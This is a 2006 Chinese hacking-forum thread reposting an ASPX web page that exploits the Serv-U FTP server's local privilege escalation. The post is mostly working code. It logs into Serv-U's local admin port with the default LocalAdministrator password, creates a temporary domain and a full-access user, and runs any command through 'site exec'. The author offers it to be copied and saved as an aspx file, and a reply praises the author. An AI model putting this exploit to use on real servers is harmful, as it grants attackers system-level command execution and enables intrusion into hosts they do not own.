‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]ServU.aspx

金州

智囊团成员

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T智囊团成员

帖子
1244 
精华
8 
积分
6154 
阅读权限
150 
性别
男 
在线时间
593 小时 
注册时间
2005-3-18 
最后登录
2008-6-6 

原创技术奖

楼主 发表于 2006-5-10 15:58  只看该作者

[转载]ServU.aspx

信息来源:lake2的专栏
原始连接:http://blog.csdn.net/lake2/archive/2006/03/16/626273.aspx

ServU的本地提权问题已经很老了,没啥说的,只是相继出现了PHP、Perl版本,当然不能少了aspx版本^_^

以下代码Copy,保存为一个aspx文件即可。
复制内容到剪贴板
代码:
<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.Net.Sockets" %>
<script runat="server">

   &#39;
   &#39; Love, Where are you ?
   
   Sub BTN_Start_Click(sender As Object, e As EventArgs)
      Dim Usr As String = Text_Name.Text
      Dim pwd As String = Text_PWD.Text
      Dim Port As Int32 = Text_Port.Text
      Dim Command As String = Text_cmd.Text
   
      Dim LoginUser As String = "User " & Usr & vbcrlf
      Dim LoginPass As String = "Pass " & pwd & vbcrlf
      Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf
      Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf
      Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _
              "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
              "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
              "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
              "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _
              "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _
              "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf
      Dim Quit As String = "QUIT" & vbcrlf
      Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf
   
      &#39;Dim client As New TcpClient
      Dim tcpClient As New TcpClient()
      Try
        tcpClient.Connect("127.0.0.1", port)
      Catch eee As Exception
        response.write(eee.ToString())
        response.end
      End Try
      tcpClient.ReceiveBufferSize = 1024
      Dim networkStream As NetworkStream = tcpClient.GetStream()
      Rec(networkStream)
      Send(networkStream, LoginUser)
      Rec(networkStream)
      Send(networkStream, LoginPass)
      Rec(networkStream)
      Send(networkStream, MAINTENANCE)
      Rec(networkStream)
      Send(networkStream, DelDomain)
      Rec(networkStream)
      Send(networkStream, NewDomain)
      Rec(networkStream)
      Send(networkStream, NewUser)
      Rec(networkStream)
          Dim tcpClient2 As New TcpClient()
          Try
             tcpClient2.Connect("127.0.0.1", 43859)
          Catch eee As Exception
             response.write(eee.ToString())
             response.end
          End Try
          tcpClient2.ReceiveBufferSize = 1024
          Dim networkStream2 As NetworkStream = tcpClient2.GetStream()
          Rec(networkStream2)
          Send(networkStream2, "User lake" & vbcrlf)
          Rec(networkStream2)
          Send(networkStream2, "pass admin123" & vbcrlf)
          Rec(networkStream2)
          Send(networkStream2, "site exec " & Command & vbcrlf)
          Rec(networkStream2)
          tcpClient2.Close()
      Send(networkStream, DelDomain)
      Rec(networkStream)
      Send(networkStream, Quit)
      Rec(networkStream)
      tcpClient.Close()
   End Sub
   
   
   
   Sub Rec(o As Object)
     If o.CanRead Then
       Dim bytes(1024) As Byte
       o.Read(bytes, 0, 1024)
       Dim returndata As String = Encoding.ASCII.GetString(bytes)
       response.Write("out:" & returndata & "<br>")
     Else
       response.Write("What&#39;s wrong ?")
     End If
   End Sub
   
   Sub Send(o As Object,data As String)
     If o.CanWrite Then
       Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)
       o.Write(sendBytes, 0, sendBytes.Length)
       response.write("in: " & data & "<br>")
     Else
       response.Write("What&#39;s wrong ?")
     End If
   End Sub

</script>
<html>
<head>
</head>
<body>
   <form runat="server">
      <p>
        <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2
        admin by lake2</asp:Label>
      </p>
      <p>
        <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label>
        <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox>
        <br />
        <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label>
        <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox>
        <br />
        <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label>
        <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox>
        <br />
        <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label>
        <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox>
      </p>
      <p>
        <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button>
      </p>
      <p>
        <hr />
        <!-- Insert content here -->
      </p>
   </form>
</body>
</html>
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre

TOP

softbug

技术核心组

Rank: 8Rank: 8

E.S.T核心成员 HRM

帖子
287 
精华
14 
积分
6821 
阅读权限
200 
性别
男 
在线时间
96 小时 
注册时间
2005-1-7 
最后登录
2008-7-22 

软件研发奖 原创技术奖

沙发 发表于 2006-5-11 21:04  只看该作者
不得不让我为你佩服,lake兄弟啊,我是草草虫啊,看到了请给我短消息,很怀恋lake的群,我号掉了
论坛地址: http://www.ssk2.cn & www.iisuser.com

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题